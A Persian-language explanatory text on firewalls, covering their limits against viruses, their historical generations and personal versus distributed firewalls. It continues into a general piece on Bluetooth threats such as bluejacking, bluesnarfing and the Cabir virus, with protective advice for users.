یک دیواره آتش معمولاً نمیتواند از ورود ویروسها جلوگیری کند: اغلب دیوارههای آتش بخشهای مربوط به آدرس مبدأ و آدرس مقصد و شماره پورت مبدأ ومقصد شبکههای ورودی را مورد بازرسی قرار میدهند و به جزئیات داده توجهی ندارند. پیادهسازی بخش تشخیص ویروس و بررسی کامل داده بستهها در دیوارههای آتش زیاد عملی وکارا نیست. انواع بسیار زیادی از ویروسها وجود دارند و روشهای زیادی برای آنکه ویروس خودش را در داخل داده مخفیکند وجود دارد. تشخیص ویروس (Virus Detection) در یک بسته تصادفی از دادهای که از دیواره آتش عبور میکند بسیار مشکل است. برای تشخیص ویروس در بستهها نیازمندیهای زیر وجود دارد:
- تشخیص این مطلب که بخش داده بسته بخشی از یک برنامه است.
- مشخص کردن اینکه یک برنامه مجاز چگونه است و چه ویژگیهایی دارد.
- تشخیص این که تفاوتی بین این برنامه و مدل برنامههای بدون مشکل و مجاز وجود دارد و بنابراین برنامه یک ویروس است.
اغلب دیوارههای آتش ماشینهایی از انواع مختلف و با فرمتهای اجرایی مختلف را مورد محافظت قرار میدهند.
یک برنامه ممکن است یک برنامه کامپایل شده قابل اجرا و یا یک script باشد. علاوه بر این، بسیاری از برنامهها قبل از اینکه انتقال یابند به شکل یک Package در میآیند و به خوبی فشرده سازی میشوند. این مسایل باعث میشود پیچیدگی مسأله تشخیص ویروسها بالاتر رود و پیادهسازی آن مشکل باشد. با این همه باز هم نمیتوان تمامی منابع دیگر انتقال ویروسها را کنترل کرد. بسیاری از برنامهها ممکن است از طریق مودمهای اشخاصی که به اینترنت متصلند و از دیواره آتش رد نمی شوند download شوند و یا با یک floppy از محل سکونت به شبکه داخلی سازمان انتقال یابند و ... روش عملی تر مقابله با ویروسها استفاد از نرم افزارهای host-base virus protection است. آموزش کاربران و آگاه کردن آنها از خطرات ویروسها نیز می تواند مؤثر باشد.
تاریخچه
اگر چه تکنولوژی دیوارههای آتش جوان است و تازه شکل گرفته اما بسیار سریع رشد کرده و در کمتر از بیست سال تحولات زیادی را پشت سر گذاشته است.
اولین نسل از دیواره های آتش در حدود سال 1985 بوجود آمدند و " دیواره های آتش پالایشگر بسته" (Packet filter firewalls) نام گرفتند. ایده اصلی آنها از امکانات نرم افزاری گرفته شده بود که متعلق به شرکت Cisco بود و تحت عنوان (IOS (Internetworking Operation system شناخته می شد. اولین مقاله در ارتباط با فرآیند غربال کردن (Screening Process) که توسط این نوع دیواره های آتش مورد استفاده قرار می گرفت در سال 1988 منتشر شد.
در سال 1989 آزمایشگاه شرکت AT&T برای اولین بار نسل دوم دیوارههای آتش که در آینده "دیوارههای آتش سطح مدار" (Circuit level firewalls) لقب گرفتند را بوجود آوردند. در همان سال آنها همچنین اولین مدل عملی (Working Model) از نسل سوم دیوارههای آتش یعنی "دیوارههای آتش لایه کاربرد" (Application layer firewalls) پیادهسازی کردند اما نه هیچ مقالهای در این ارتباط منتشر شد و نه محصولی بر اساس این مدل به بازار عرضه گشت.
در اواخر سال 1989 و اوایل دهه 90 تحقیقات مختلف و پراکنده ای در سطح کشور آمریکا بر روی نسل سوم دیواره های آتش انجام شد و بالاخره نتایج این تحقیقات به صورت جداگانه درسال های 1990 و 1991 توسط Gene Spafford از دانشگاه Bill Cheswick,Purdue از لابراتوری Bell شرکت AT&T و Marcus Ranum انتشار یافتند. در سال 1991 تحقیقات Marcus Ranum بیشترین توجه را به خودش معطوف کرد و باعث بوجود آمدن Bastion host هایی که سرویس proxy را اجرا می کردند شد. نتایج این تحقیقات به سرعت در اولین محصول تجاری شکل عینی یافت و به کار گرفته شد. این محصول که SEAL نام داشت توسط شرکت DEC عرضه شد.
در اواخر سال1991، Bill Cheswick و Steve Bellovin تحقیقاتی را در ارتباط با پالایش کردن بسته ها به صورت پویا (Dynamic) شروع کردند و بر این اساس محصولی داخلی را در لابراتوار Bell پیادهسازی کردند که البته هرگز به بیرون عرضه نشد. در سال 1992، Bob Barden و Annette DeSchon در مؤسسه USC’s Information Sience Institute تحقیقاتی را بر روی نسل چهارم دیوارههای آتش تحت عنوان "دیوارههای آتش پالایشگر بسته پویا" (Dynamic packet filter firewalls) برای سیستمی با نام Visas به طور جداگانه شروع کردند و در نهایت نرم افزار Chech Point، اولین محصول تجاری بر پایه معماری نسل چهارم دیواره های آتش، در سال 1994 به بازار عرضه شد.
در سال 1996، Scott Wiegel طرحی را برای نسل پنجم دیوارههای آتش با عنوان Kernel Proxy ارائه داد. دیواره آتش Cisco Centri که درسال 1997 پیاده سازی شد اولین محصول تجاری بر اساس معماری این نسل بود.
در سال های اخیر نیاز به سیستم های امنیتی که پرسرعت و در عین حال قابل گسترش(Extensible)، قابل نگهداری(Maintainable) و انعطاف پذیر (Flexible) باشند باعث شده است شرکت های فعال در زمینه امنیت در تکاپوی یافتن راه حلهایی مناسب و کاربردی برای پاسخگویی به این نیازها باشند.
انواع دیوارههای آتش
دیوارههای آتش پالایشگر بسته
دیوارههای آتش سطح مدار
دیوارههای آتش لایة کاربرد
دیوارههای آتش پالایشگر بسته پویا
دیوارههای آتش Kernel Proxy
دیوارههای آتش مخفی
دیوارههای آتش توزیع شده
دیوارههای آتش شخصی
دیوارههای آتش با توسعهپذیری بالا
دیوارههای آتش نرمافزاری.
دیوارههای آتش اختصاصی
دیوارههای آتش شخصی
دیوارههای آتش شخصی (که به آنها desktop firewalls نیز گفته میشود) نرمافزارهایی هستند که برای محافظت از یک کامپیوتر تنها که به اینترنت متصل است مورد استفاده قرار میگیرند. این کامپیوتر ممکن است به طور دائمی (از طریق خطوط Cable modem , DSL) و یا موقت (از طریق ارتباطات Dial-up) به اینترنت متصل باشد. در مقایسه با برنامه های anti-virus دیواره های آتش در background و در سطحی پایین تر اجرا می شوند. دیواره های آتش شخصی با چک کردن جامعیت فایل های سیستم، پالایش ترافیک ورودی و خروجی، اخطار به کاربر در ارتباط با حملات در حال شکلگیری و .... سعی میکنند کامپیوتر مرتبط با اینترنت را مورد محافظت قرار دهند. در آیندة نزدیک امنسازی سیستمها با دیوارههای آتش شخصی به یکی از استانداردهای کامپیوترهای خانگی تبدیل خواهد شد.
دیوارههای آتش شخصی مانند دیوارههای آتش توزیع شده کار میکنند به جز چند مورد. در واقع قابلیتهای دیوارههای آتش توزیع شده بیشتر از دیوارههای آتش شخصی است. دیوارههای آتش شخصی برای محافظت از یک کامپیوتر تنها که به اینترنت متصل است استفاده میشود در حالی که دیوارههای آتش توزیع شده برای محافظت از کامپیوترهای موجود در یک شبکة بزرگ سازمانی طراحی شدهاند.یک شرکت یا سازمان می تواند با خرید یک distributed firewall solution، کارمندان دور، شبکههای محلی سازمان و شبکههای گستردهاش را مورد محافظت قرار دهد. مدیریت مرکزی، قابلیت logging در یک نقطة مرکزی و ریزسازی کنترل دسترسی(Access Control Granularity) ویژگیهایی هستند که در دیوارههای آتش شخصی وجود ندارند. میتوان گفت دیوارههای آتش شخصی مستقل و مجزا هستند در حالی که دیوارههای آتش توزیع شده با یک نقطة مرکزی در ارتباطند و در صحبت با او قادرند اطلاعات سیاستهای امنیتی را دریافت و اطلاعات ثبت شده و جمعآوری شده را ارسال کنند (به این علت به دیواره های آتش توزیع شده Firewall agent نیز گفته می شود). از دیوارههای آتش شخصی عموماً برای کامپیوترهای شخصی و خانگی استفاده میشود حال آن که دیوارههای آتش توزیع شده علاوه بر محافظت از کامپیوترهای شخصی و ایستگاههای موجود در شبکه قادرند سرویسگرهای مهم و حساس را نیز مورد محافظت قرار دهند. برخی از دیوارههای آتش توزیع شده را میتوان به گونهای پیکربندی کرد که کاملاً شفاف عمل کنند. آنها هیچ رابط گرافیکی ندارند و سیاستهای امنیتی بدون این که کاربر از آنها اطلاعی داشته باشد به دیوارة آتش منتقل میشود. بدین ترتیب درگیری کاربر نهایی حذف میشود و او نمیتواند در سیاستهای امنیتی مداخله کرده یا دیوارة آتش را غیر فعال کند. این قابلیت عموماً در دیوارههای آتش شخصی وجود ندارد.
برخی از دیوارههای آتش شخصی عبارتند از:
- ConSeal PC firewall
- ConSeal Private Desktop
- SyShield
- BlackICE Defender
- ZoneAlarm
- Norton Internet Security 2000 (firewall & virus protection)
- Internet Connection Firewall (Windows XP built-in personal firewall)
فناوری Bluetooth با دارابودن قابلیت عملکرد به عنوان یک روش شبکه سازی بی سیم میان ابزارهای واقع در یک شعاع ده متری ، دربرگیرنده طیفی از دستگاه ها، نظیر تلفن های سلولی ، نوت بوک ها ، و PDA ها می باشد. فناوری بلوتوث اکنون از تجهیزات پزشکی تا کنسول های بازی را در بر می گیرد. حتی سرویس پک2 ویندوز XP هم از بلوتوث پشتیبانی می نماید. ابزارهای بلوتوث، هدف تهدیدات امنیتی گوناگونی هستند. گرچه این تهدیدات هنوز در سطح و اندازه تهدیداتی نیست که متوجه شبکه های Wi-Fi هستند، لیکن هنگام با رشد محبوبیت بلوتوث ،باید توقع تغییر در این وضعیت را داشت. نگذارید بردکاری کوتاه ، تکنولوژی بلوتوث شما را فریب دهد. در دنیایی که اغلب مردم تلفن های سلولی و موبایل در اختیار دارند، خطرات بلوتوث می تواند به نزدیکی شخصی پشت سری شما در یک صف و یا داخل ماشین کناری باشد. برای ایجاد ارتباط، ابزارهای بلوتوث باید ابتدا با یکدیگر جفت شوند. چنانچه ابزارهایی دارید که به بلوتوث مجهزند و شما تمایل دارید آنها را با یکدیگر مرتبط کنید،(مثل PDA با چاپگر یا موبایل با نوت بوک) عموما و در اثنای این ارتباط سازی ، مایل به ارتباط این دستگاه ها با کاربران ناشناس نیستید.
ابزارهای بلوتوث چنین مواردی را به وسیله تنظیمات گوناگون امنیتی اداره می نمایند. ولی به شما بستگی دارد که از فعال بودن این تنظیمات اطمینان حاصل نمایید. اگر شما تنظیمات دستگاه خود را بر روی حالت Discoverable قرار دهید، هرکاربر بلوتوثی که در شعاع تحت پوشش قرار داشته باشد، می تواند ارتباط برقرار نماید. مشخصات فنی بلوتوث تا اندازه زیادی امن است و این امکان وجود دارد که بتوان ارتباط دستگاه ها را چنان برقرار کرد که اطلاعات به صورت رمزنگاری شده تبادل گردند. اما برای پیاده سازی و اجرای این تمهیدات، مشکلاتی نیز وجود دارند. یک مثال مهم در این باره ویروس Cabir است که از طریق اتصال بلوتوث انتشار یافته و موبایل هایی را که از سیستم عامل Symbian سری 60 استفاده می نماید، با استفاده از یک حفره امنیتی که در کد Symbian وجود دارد، آلوده می سازد. البته باید دانست که همه خطرات و تهدیدات مربوط به بلوتوث ، وابسته به پلتفرم نیستند. هرچند محبوبیت بلوتوث باعث افزایش پاره ای تهدیدات امنیتی به نام bluebugging ، bluejacking و bluesnarfing گردیده اند . در bluejacking فردی به صورت ناشناس اتصال را برقرار می نماید و کارت ویزیت الکترونیکی بر روی یک دستگاه مجهز به بلوتوث را ارسال می کند. bluebugging خطر جدی تری دارد. به صورتی که یک کاربر دیگر بلوتوث امکان می یابد با متصل شدن به یک تلفن سلولی یا یک PDA ، به اجرای دستورات ، برقراری مکالمه، ارسال پیام های متنی و حتی استراق سمع یک مکالمه اقدام کند. bluesnarfing به یک کاربر بلوتوث امکان می دهد با اتصال به دستگاه های دیگری که در برکاری و موثر قرار دارند، به مشخصات تماس ها، تقویم، و سایر اطلاعات دیگر دسترسی پیدا کند. هرچه کاربران و صاحبان دستگاه ها و ادوات مجهز به بلوتوث اطلاعات شخصی بیشتر و مهم تری را برروی ابزارهای خود ذخیره نمایند، نیاز به شناسایی تهدیدات بالقوه و پنهانی که امنیت و حریم خصوصی را مورد حمله قرار می دهند بیشتر احساس می گردد. خوشبختانه ایمن سازی ادوات بلوتوث کار چندان دشواری نیست . به عنوان مثال باید Pair کردن ابزارهای خود را با رعایت جنبه های ایمنی انجام دهید. از کد PIN(شماره شناسایی شخصی) با داشتن حداقل هشت رقم، استفاده نمایید. همیشه عمل اتصال به تجهیزات را در مکان های خصوصی و امن انجام دهید تا ریسک لورفتن PIN Code شما به حداقل برسد. برای از بین بردن خطر دسترسی افراد ناشناس به دستگاهتان، تنظیمات آن را روی حالت nondiscoverable قرار دهید. به طور مرتب و در فواصل زمانی کوتاه ، وب سایت کارخانه سازنده دستگاه خود را جهت دریافت برزورسانی ها و وصله های امنیتی جدید بازدید نمایید. از زمانی که صدمه پذیر بودن تلفن های سلولی نیز مشخص شدند، سازندگان این دسته از ابزارها نیز به انتشار وصله های امنیتی برای دستگاه های خود اقدام می نمایند. دریافت و اعمال نمودن این Patchها ، تفاوت میان قراردادن دستگاه در برابر آخرین تهدیدات و یا در امان بودن از هر گونه ریسک و خطر را نمایان می سازد. هیچ گاه پیغام ها و درخواست های اتصال از طریق بلوتوث را از جانب کاربران ناشناس نپذیرید. ویروس Cabir تنها از طریق قبول دریافت پیغام و اجرای فایل پیوست آن ، دستگاه را آلوده می نماید. در زمانی هم که با یک پیوست مشکوک مواجه می شوید که به همراه یک ایمیل از طریق بلوتوث به دستتان می رسد، احتیاط و پیشگیری مشابه را بنمایید. با رشد بیشتر استفاده از بلوتوث ، این امکان وجود دارد که این پروتکل ارتباطی، به هدف محبوبی برای کلیه تهدیدات امنیتی ، شامل ویروس ها ، تهدیدات هکرها و عمدتا حملاتی با سبک تروجان ها تبدیل گردد. حمایت و محافظت از دستگاه های مجهز به بلوتوث ، این ارزش را دارد که با بی مبالاتی و ساده انگاری ، هدف اولین موج حملات امنیتی قرار نگیریم.